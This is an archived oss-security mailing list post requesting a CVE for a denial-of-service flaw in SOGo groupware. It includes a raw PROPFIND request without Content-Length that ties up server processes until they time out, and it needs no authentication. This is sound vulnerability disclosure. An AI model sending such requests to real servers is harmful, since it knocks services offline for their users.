Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 7 Jul 2015 13:53:21 +0200
From: Stefan Castille <stefan.castille@...nierdigital.se>
To: <oss-security@...ts.openwall.com>
Subject: CVE Request for sogO Open Source Groupware (www.sogo.nu)

Hej,

I would like to request a CVE for a DoS in sogo. While it does not crash
the system, it does make it very easy to conduct a DoS against the
application.


Software: sogo
Vendor: Inverse
Site: www.sogo.nu
Previously requested: No
Type: DoS
Description: Due to incorrect handling of certain PROPFIND requests, the
site is vulnerable to a DoS.

-----------------------------------
PROPFIND /SOGo/dav/ HTTP/1.1
Host: <hostname>
Connection: keep-alive
Content-Length: 0


------------------------------------

will return almost immediately

-----------------------------------
PROPFIND /SOGo/dav/ HTTP/1.1
Host: myhost
Connection: keep-alive


-----------------------------------
without the Content-Length will keep the child process occupied until it
times out. Default value one minute. With only <#processes> requests per
<timeout> the application can be rendered inaccessible.

No authentication/valid account is required. The bug has been reported
at www.sogo.nu/bugs as a private bugreport, but labelled won't fix as it
is 'how servers work' and that tuning the timeout will help. I disagree
and would like to get a CVE for it.


with kind regards,
Stefan

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ